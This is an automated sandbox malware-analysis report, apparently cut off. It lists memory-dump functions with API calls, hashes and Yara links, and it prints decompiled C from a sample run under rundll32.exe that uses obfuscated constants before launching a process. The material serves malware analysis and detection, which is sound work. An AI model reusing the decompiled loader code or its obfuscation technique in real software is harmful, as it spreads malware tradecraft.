Function 6EA11540, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(00000008,00000000,00000000), ref: 6EA115AD
GetLastError.KERNEL32 ref: 6EA115B7

Strings

@Mt, xrefs: 6EA115B7

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: 1c28b5f342f0464fad7bd75ee3e57ca6b02741db1fb7701d00f3e462ba2dca17
Instruction ID: 7e85b1e7b0116e2d1d1dddba97de2bb69e1648c7d1f7f9990992491c71469fd0
Opcode Fuzzy Hash: 1c28b5f342f0464fad7bd75ee3e57ca6b02741db1fb7701d00f3e462ba2dca17
Instruction Fuzzy Hash: 09213B365087128BD7118EA6C804B977BE6AFF5764F15451DE859CB300EB71D8C583D8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA27B39, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 6EA27C0A: _free.LIBCMT ref: 6EA27C18

Part of subcall function 6EA2C78F: MultiByteToWideChar.KERNEL32(6EA2C5A6,00000100,E8458D00,00000000,00000000,00000020,?,6EA2DDB4,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 6EA2C7FF

GetLastError.KERNEL32 ref: 6EA27B9D
__dosmaperr.LIBCMT ref: 6EA27BA4

Strings

@Mt, xrefs: 6EA27B9D

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr_free
String ID: @Mt
API String ID: 4030486722-1491384996
Opcode ID: 748eb8855d15336df220cf7a07c59bdace6b9471032a1c56b9de8318752becce
Instruction ID: 359e2495d07c22834d86e8aeb2f92cc258ce92184e6d36ee4144619057e60769
Opcode Fuzzy Hash: 748eb8855d15336df220cf7a07c59bdace6b9471032a1c56b9de8318752becce
Instruction Fuzzy Hash: F221EB31504616AFDB118FA6CD00E4B77A9EF81324F1C4534F929B76D0D732EA80C798

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01F60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6EA01F86
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA0201A

Part of subcall function 6EA1D419: _free.LIBCMT ref: 6EA1D42C

Strings

K;(Io, xrefs: 6EA01F72

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~__free
String ID: K;(Io
API String ID: 2189227594-79920696
Opcode ID: 1b0a0a6aeabdd38066fab8b42243c34a2d2f9297941a04aef364671b5d7329e9
Instruction ID: 03e64cac24b1a0fb21e9fa3e4521cdd70c5d5cebb183ff13cf212c15470c724e
Opcode Fuzzy Hash: 1b0a0a6aeabdd38066fab8b42243c34a2d2f9297941a04aef364671b5d7329e9
Instruction Fuzzy Hash: 78115EF1A047415BEB60DFA5D914BA7B3ECAB0460CF04493DD82AC7640EB75F948CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6EA0EA90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA0E6B0: CoTaskMemAlloc.OLE32(6EA0DE78,49283B4B,00000000,00000000), ref: 6EA0E748
Part of subcall function 6EA0E6B0: CoTaskMemFree.OLE32(00000000,49283B4B,00000000,00000000), ref: 6EA0E774

CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6EA0EB2C

Part of subcall function 6EA0DF40: CharNextW.USER32(?,00000000,00000000,?,C000008C,00000001), ref: 6EA0DF7E
Part of subcall function 6EA0DF40: CharNextW.USER32(00000000,?,00000000,00000000), ref: 6EA0DFAB
Part of subcall function 6EA0DF40: CharNextW.USER32(7691EEF0,?,00000000,00000000), ref: 6EA0DFC4
Part of subcall function 6EA0DF40: CharNextW.USER32(7691EEF0,?,00000000,00000000), ref: 6EA0DFCF
Part of subcall function 6EA0DF40: CharNextW.USER32(00000001,?,00000000,00000000), ref: 6EA0E03E

lstrcmpiW.KERNEL32(?,6EA45C7C,?,00000000,C000008C,00000000,00000000), ref: 6EA0EB0D
CharNextW.USER32(?,?,00000000,00000000,00000000,?), ref: 6EA0EBF1

Strings

K;(Io, xrefs: 6EA0E6C4, 6EA0EA9D

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$Alloclstrcmpi
String ID: K;(Io
API String ID: 1538375688-79920696
Opcode ID: e33e9b6865108c746ac84ca136744686176541f377bbe69f4d36aaa0e56a2598
Instruction ID: d689040cf298d65dc01c236472d916a565f63544218888ea94855dccd8ce73bc
Opcode Fuzzy Hash: e33e9b6865108c746ac84ca136744686176541f377bbe69f4d36aaa0e56a2598
Instruction Fuzzy Hash: 4C11AE72A002299BDF249F94DC9479B77F8FF45704F1184A9E50AD7201DB309DC5CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA393C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,49283B4B,?,?,?,?,6EA38560,000000FF), ref: 6EA39420
DeleteCriticalSection.KERNEL32(6EA4CA3C,49283B4B,?,?,?,?,6EA38560,000000FF), ref: 6EA39440

Strings

K;(Io, xrefs: 6EA393D4

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDecodeDeletePointerSection
String ID: K;(Io
API String ID: 2063605820-79920696
Opcode ID: fd2df9d12abfc071ea8903b9540a5c6131288ad395cd7fd5c5e5b6bf36fb35ee
Instruction ID: 35f1bcea55c10559278e48613939d170a67f373b9cbbb15292159dea00605997
Opcode Fuzzy Hash: fd2df9d12abfc071ea8903b9540a5c6131288ad395cd7fd5c5e5b6bf36fb35ee
Instruction Fuzzy Hash: DA11AC76500615DFEB10DF99C890B55B7E9FB06318F11816AE819EB780DB32AC85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA08380, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6EA08669
SysFreeString.OLEAUT32(?,80004003,49283B4B,?,?), ref: 6EA08674

Strings

K;(Io, xrefs: 6EA08394

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString_com_issue_error
String ID: K;(Io
API String ID: 709734423-79920696
Opcode ID: 395b09203009180dcc8f649115cdf06734acf8c842156a23f85622c76cbf2d24
Instruction ID: 783c8e220cfb21af27d859af6961d14db443236a87bd6e2e11a755fd4537b792
Opcode Fuzzy Hash: 395b09203009180dcc8f649115cdf06734acf8c842156a23f85622c76cbf2d24
Instruction Fuzzy Hash: B2F082B0400249EFEB01EFE5CD54FAFBBBCEB0162CF10061DE415AA680DB345944CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA08730, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6EA0894C
SysFreeString.OLEAUT32(76AFD5B0), ref: 6EA08952

Strings

K;(Io, xrefs: 6EA08744

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString_com_issue_error
String ID: K;(Io
API String ID: 709734423-79920696
Opcode ID: 4c7dc7117387506a46680e408c2bace9852b54f42dbc17fb7540b778a6b549ec
Instruction ID: 5a9f40268f578a9650236289cb021cd92f9e4b0d8a6e1686d2b48d549eea8e18
Opcode Fuzzy Hash: 4c7dc7117387506a46680e408c2bace9852b54f42dbc17fb7540b778a6b549ec
Instruction Fuzzy Hash: 0BF0BEB0500248EBEB01DBA5CD44FABB6A8EB06628F20462CE516AA280D7345944C699

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17721, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,6EA07CE5,?,00000000,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA17744
SysAllocString.OLEAUT32(00000000), ref: 6EA1774F

Part of subcall function 6EA1D419: _free.LIBCMT ref: 6EA1D42C

_com_issue_error.COMSUPP ref: 6EA17778
_com_issue_error.COMSUPP ref: 6EA17782
GetLastError.KERNEL32(80070057,49283B4B,?,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA17787
_com_issue_error.COMSUPP ref: 6EA1779A
GetLastError.KERNEL32(00000000,?,00000000,?,Function_00018230,6EA4A030,000000FE,?,6EA07CE5), ref: 6EA177B0
_com_issue_error.COMSUPP ref: 6EA177C3

Strings

K;(I, xrefs: 6EA1773C

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ErrorLast$AllocByteCharMultiStringWide_free
String ID: K;(I
API String ID: 878839965-389176783
Opcode ID: cf87fd729f4007b290808586741373ef5662f2cbfbe7d45769c751c20251e40c
Instruction ID: 97f21649c87037827927190745ed68fd3768845a8b9fa83e56aeed8d969fdbd6
Opcode Fuzzy Hash: cf87fd729f4007b290808586741373ef5662f2cbfbe7d45769c751c20251e40c
Instruction Fuzzy Hash: A201A271E083559BDB108FD4D885BDEB775EB4A661F000129FD15A7280C7715881C699

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2E36C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 6EA352BC: EnterCriticalSection.KERNEL32(00000001,?,6EA2EC6C,?,6EA4A680,00000010,6EA269BD,00000000,00000000,?,?,?,?,6EA26A01,?,00000000), ref: 6EA352D7

FlushFileBuffers.KERNEL32(00000000,6EA4A660,0000000C,6EA2E469,6EA26918,?,00000001,?,6EA26918,?), ref: 6EA2E3B5
GetLastError.KERNEL32 ref: 6EA2E3C6

Strings

@Mt, xrefs: 6EA2E3C6

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: @Mt
API String ID: 4109680722-1491384996
Opcode ID: 7472b1c7983439b958c089befb107a2be9f2bacf034374d101922296948165a5
Instruction ID: cf7bbef57428d61c4772e6f33792f15bf48dd710a6e95affef1e4558f9e696c1
Opcode Fuzzy Hash: 7472b1c7983439b958c089befb107a2be9f2bacf034374d101922296948165a5
Instruction Fuzzy Hash: 5C018471910724CFCB119FF8CA04A8D7BA9AF06724B15856AF414FF390D774D982CB48

Uniqueness

Uniqueness Score: -1.00%

Function 6EA02040, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA0205D
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA02079

Strings

K;(Io, xrefs: 6EA02046

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: K;(Io
API String ID: 593203224-79920696
Opcode ID: 44af9ad47a79659187b810950db89d38e08b57800669e6540af1bd4d077f53cb
Instruction ID: f17bfab1d1fbe62ed3315c7e65397231f017ea952707d029134b58ef71fa697b
Opcode Fuzzy Hash: 44af9ad47a79659187b810950db89d38e08b57800669e6540af1bd4d077f53cb
Instruction Fuzzy Hash: E3F08230915308DFD715EF94E940AD9B7F9EB05305F1104ADD48667280DF715EC5CB44

Uniqueness

Uniqueness Score: -1.00%

Function 6EA018B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6EA018B5

Part of subcall function 6EA152A1: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6EA152AD

___std_exception_copy.LIBVCRUNTIME ref: 6EA018DE

Strings

string too long, xrefs: 6EA018B0

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: acca7e1759eecaf0cfdbd5bc6355a99a5b71054c37cc111864dfe19025b78aed
Instruction ID: 83807f4c4cb063b6cb63f543d4dc2d91da27681e3aef27091f6e11a2ad73b69d
Opcode Fuzzy Hash: acca7e1759eecaf0cfdbd5bc6355a99a5b71054c37cc111864dfe19025b78aed
Instruction Fuzzy Hash: 63E08CB29242295BCB109FD8EC018C6B69E9F16258324892AF644EB600E670E8C083A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(6EA4CA3C,00000000,00000000), ref: 6EA01009
GetLastError.KERNEL32 ref: 6EA01013

Strings

@Mt, xrefs: 6EA01013

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: 6fcd82f9c156f0c49cd271ed14aea7ba93851948d01f5be392d3e1f8d4cddb1c
Instruction ID: 159465584e45470d0ec57a11697b333829d6ca6fcb34595689dae98e71d5a25a
Opcode Fuzzy Hash: 6fcd82f9c156f0c49cd271ed14aea7ba93851948d01f5be392d3e1f8d4cddb1c
Instruction Fuzzy Hash: 55E086682047E08AFB10AEE55E087D5269A271235DF21C819E086FC5C0DB6981C9AA2D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA010B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(6EA4E348,00000000,00000000), ref: 6EA010C3
GetLastError.KERNEL32 ref: 6EA010CD

Strings

@Mt, xrefs: 6EA010CD

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: 3d1f728a4e891461133f00879d8d96a4a92df7d3a3e4ee0d60c67227b44921db
Instruction ID: 7b69b4fec73d42671707c212cb6b967bfe6e330b66cf738537561466fd1d1545
Opcode Fuzzy Hash: 3d1f728a4e891461133f00879d8d96a4a92df7d3a3e4ee0d60c67227b44921db
Instruction Fuzzy Hash: 56E04874214790CAFB12DFE69A45B9536D5671270CF25C008E585ED180D77790C9971D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA17089, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6EA07BA0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6EA4A8C4), ref: 6EA07BA5
Part of subcall function 6EA07BA0: GetLastError.KERNEL32(?,00000000,00000000,?,6EA4A8C4), ref: 6EA07BAF

IsDebuggerPresent.KERNEL32(?,?,?,6EA011DF), ref: 6EA170BC
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6EA011DF), ref: 6EA170CB

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6EA170C6

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: a16c75306c079271ad605f0d17bb95b53ab8959fd158f29ac29e21c6a03e4b6b
Instruction ID: 22db00fcdca827515eee8a07437e2202a8e13d19a69ddcf62756f8a4bf87ca8f
Opcode Fuzzy Hash: a16c75306c079271ad605f0d17bb95b53ab8959fd158f29ac29e21c6a03e4b6b
Instruction Fuzzy Hash: 4FE06D70104B618FD730EFA8D404386BBE9AF02308F01CE1CE496DA680EBB1D4C98B59

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01060, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(6EA4CA58,00000000,00000000), ref: 6EA01069
GetLastError.KERNEL32 ref: 6EA01073

Strings

@Mt, xrefs: 6EA01073

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: fc60a70010c48e9babde1539a8aaf202825b409e41fd01c6ee5f8c00f43f467f
Instruction ID: b4f612010f92a84df1d343f34ba86f7bb8aec96b7948ff7aa8bd12685e53f1ec
Opcode Fuzzy Hash: fc60a70010c48e9babde1539a8aaf202825b409e41fd01c6ee5f8c00f43f467f
Instruction Fuzzy Hash: 40E0C2703443E0C6FB209EF08D087A037D6671230CF21C414E4C5ED580E76AD08E922D

Uniqueness

Uniqueness Score: -1.00%

Function 6EA07BA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6EA4A8C4), ref: 6EA07BA5
GetLastError.KERNEL32(?,00000000,00000000,?,6EA4A8C4), ref: 6EA07BAF

Strings

@Mt, xrefs: 6EA07BAF

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalErrorInitializeLastSection
String ID: @Mt
API String ID: 3413597225-1491384996
Opcode ID: 1f313738a332ba5d763902f84e1f5679ded6120c7e19150b689e75f90383041a
Instruction ID: 3614de7902420e0e6e646c9c197e66fbfd3dd72dc19da6a0b657e440d0170da5
Opcode Fuzzy Hash: 1f313738a332ba5d763902f84e1f5679ded6120c7e19150b689e75f90383041a
Instruction Fuzzy Hash: 9BC08C70360B6142EF607F718C08B52369C7B43B0AFA8C8A8B00AEC0D0EB7CC441E62C

Uniqueness

Uniqueness Score: -1.00%

Function 6EA173A0, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6EA1226B), ref: 6EA173A5
HeapAlloc.KERNEL32(00000000), ref: 6EA173AC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6EA173F2
HeapFree.KERNEL32(00000000), ref: 6EA173F9

Part of subcall function 6EA1723E: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6EA173E8,00000000), ref: 6EA17262
Part of subcall function 6EA1723E: HeapAlloc.KERNEL32(00000000), ref: 6EA17269

Memory Dump Source

Source File: 00000004.00000002.585587759.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000004.00000002.585584852.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585604235.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.585611473.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.585614755.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: e1f4d995c69f0cfbb345f6b80a2cd9b02bb7b36bb9d9b94dbf16b9bcb790494d
Instruction ID: 5a90903ce59fff27914cc4d4c1b36777f8279a4400f3a3ccfe29e1327ff59cf4
Opcode Fuzzy Hash: e1f4d995c69f0cfbb345f6b80a2cd9b02bb7b36bb9d9b94dbf16b9bcb790494d
Instruction Fuzzy Hash: 52F0967254CF215BCF7117F9DC0C9DE2A6AAB836517159418F841DA284DE21C8838798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6628 Parent PID: 6596 rundll32.exeCOMMON

Executed Functions

Function 00419100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00419100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E00408002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E0041E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x0041910a
0x0041910c
0x0041910d
0x0041910e
0x00419111
0x00419114
0x00419117
0x0041911a
0x0041911d
0x00419120
0x00419123
0x00419126
0x00419127
0x0041912a
0x0041912d
0x00419130
0x00419133
0x00419134
0x00419137
0x00419138
0x00419139
0x0041913a
0x0041913f
0x00419149
0x0041914c
0x00419153
0x0041915a
0x00419161
0x00419168
0x0041916f
0x00419176
0x0041918e
0x00419191
0x00419198
0x0041919f
0x004191a6
0x004191ad
0x004191b4
0x004191bb
0x004191c2
0x004191d5
0x004191ef
0x004191f6

APIs

CreateProcessW.KERNELBASE(?,EDCDBEB4,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 004191EF

Strings

31, xrefs: 0041919F

Memory Dump Source

Source File: 00000005.00000002.582699855.0000000000400000.00000040.00000010.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID: 31
API String ID: 963392458-1099231638
Opcode ID: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction ID: f921a356b77e456c759c31192d7c4266e5074c6ed965915678afe30fd74ba70e
Opcode Fuzzy Hash: 802e8488796198306ded7f534c69eccd1f3fee1a7ddcada247a2de1a0aa744a2
Instruction Fuzzy Hash: 9831E272801259BBCF559FA6CD05CDFBFB5FB89714F108158FA2462120C3768A60EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00410207, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00410207(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
